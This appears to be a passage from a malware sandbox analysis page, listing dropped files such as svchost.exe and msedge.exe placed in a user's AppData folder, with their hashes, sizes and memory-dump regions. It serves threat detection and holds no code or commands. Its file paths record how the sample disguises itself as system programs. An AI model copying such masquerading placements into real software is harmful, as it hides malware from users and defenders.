0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
memory/764-173-0x0000000000000000-mapping.dmp

Download
memory/1268-195-0x0000000000000000-mapping.dmp

Download
memory/1268-198-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/1792-158-0x0000000000000000-mapping.dmp

Download
memory/1972-242-0x0000000000A90000-0x0000000000B4F000-memory.dmp

Filesize
764KB

Download
memory/1972-241-0x0000000000A40000-0x0000000000A46000-memory.dmp

Filesize
24KB

Download
memory/1972-243-0x0000000002C00000-0x0000000002CA9000-memory.dmp

Filesize
676KB

Download
memory/1972-232-0x0000000000000000-mapping.dmp

Download
memory/1972-235-0x0000000002540000-0x000000000269F000-memory.dmp

Filesize
1MB

Download
memory/1972-237-0x0000000002540000-0x000000000269F000-memory.dmp

Filesize
1MB

Download
memory/2100-209-0x0000000000000000-mapping.dmp

Download
memory/2100-226-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/2100-224-0x000001FD5C050000-0x000001FD5C7F6000-memory.dmp

Filesize
7MB

Download
memory/2100-212-0x000001F53DDB0000-0x000001F53DDB6000-memory.dmp

Filesize
24KB

Download
memory/2100-213-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/2140-161-0x0000000000000000-mapping.dmp

Download
memory/2608-231-0x0000000000000000-mapping.dmp

Download
memory/2748-132-0x0000000000000000-mapping.dmp

Download
memory/3360-157-0x0000000000000000-mapping.dmp

Download
memory/3428-206-0x0000000000000000-mapping.dmp

Download
memory/3516-222-0x0000000002C30000-0x0000000002C36000-memory.dmp

Filesize
24KB

Download
memory/3516-220-0x0000000000400000-0x000000000055F000-memory.dmp

Filesize
1MB

Download
memory/3516-228-0x0000000003240000-0x00000000032E9000-memory.dmp

Filesize
676KB

Download
memory/3516-227-0x0000000003180000-0x000000000323F000-memory.dmp

Filesize
764KB

Download
memory/3516-217-0x0000000000000000-mapping.dmp

Download
memory/3612-200-0x0000000000000000-mapping.dmp

Download
memory/3612-203-0x0000000000B80000-0x0000000000BD2000-memory.dmp

Filesize
328KB

Download
memory/3612-204-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/3796-169-0x0000000000000000-mapping.dmp

Download
memory/3880-215-0x0000000000000000-mapping.dmp

Download
memory/3888-178-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/3888-199-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/3888-182-0x000000001CB00000-0x000000001CB1E000-memory.dmp

Filesize
120KB

Download
memory/3888-181-0x000000001DFC0000-0x000000001E036000-memory.dmp

Filesize
472KB

Download
memory/3888-180-0x000000001E7D0000-0x000000001ECF8000-memory.dmp

Filesize
5MB

Download
memory/3888-179-0x000000001E0D0000-0x000000001E292000-memory.dmp

Filesize
1MB

Download
memory/3888-177-0x000000001CB20000-0x000000001CB5C000-memory.dmp

Filesize
240KB

Download
memory/3888-175-0x000000001CAC0000-0x000000001CAD2000-memory.dmp

Filesize
72KB

Download
memory/3888-167-0x0000000000230000-0x00000000002AE000-memory.dmp

Filesize
504KB

Download
memory/3888-171-0x000000001D440000-0x000000001D54A000-memory.dmp

Filesize
1MB

Download
memory/3888-164-0x0000000000000000-mapping.dmp

Download
memory/3888-168-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/4160-133-0x0000000000895000-0x00000000008A8000-memory.dmp

Filesize
76KB

Download
memory/4244-140-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4244-150-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4244-141-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4244-142-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4244-143-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4244-137-0x0000000000000000-mapping.dmp

Download
memory/4244-193-0x0000000000000000-mapping.dmp

Download
memory/4848-189-0x0000000000000000-mapping.dmp

Download
memory/4848-192-0x0000000000FFB000-0x0000000001001000-memory.dmp

Filesize
24KB

Download
memory/4928-156-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/4928-136-0x0000000000000000-mapping.dmp

Download
memory/4928-138-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/5076-147-0x0000000000940000-0x0000000000976000-memory.dmp

Filesize
216KB

Download
memory/5076-152-0x0000000000940000-0x0000000000976000-memory.dmp

Filesize
216KB

Download
memory/5076-146-0x0000000000000000-mapping.dmp

Download
memory/5076-155-0x0000000000940000-0x0000000000976000-memory.dmp

Filesize
216KB

Download
memory/5108-205-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/5108-208-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/5108-188-0x0000000002340000-0x0000000002390000-memory.dmp

Filesize
320KB

Download
memory/5108-187-0x00007FFF3C080000-0x00007FFF3CB41000-memory.dmp

Filesize
10MB

Download
memory/5108-186-0x0000000000090000-0x0000000000106000-memory.dmp

Filesize
472KB

Download
memory/5108-183-0x0000000000000000-mapping.dmp

Download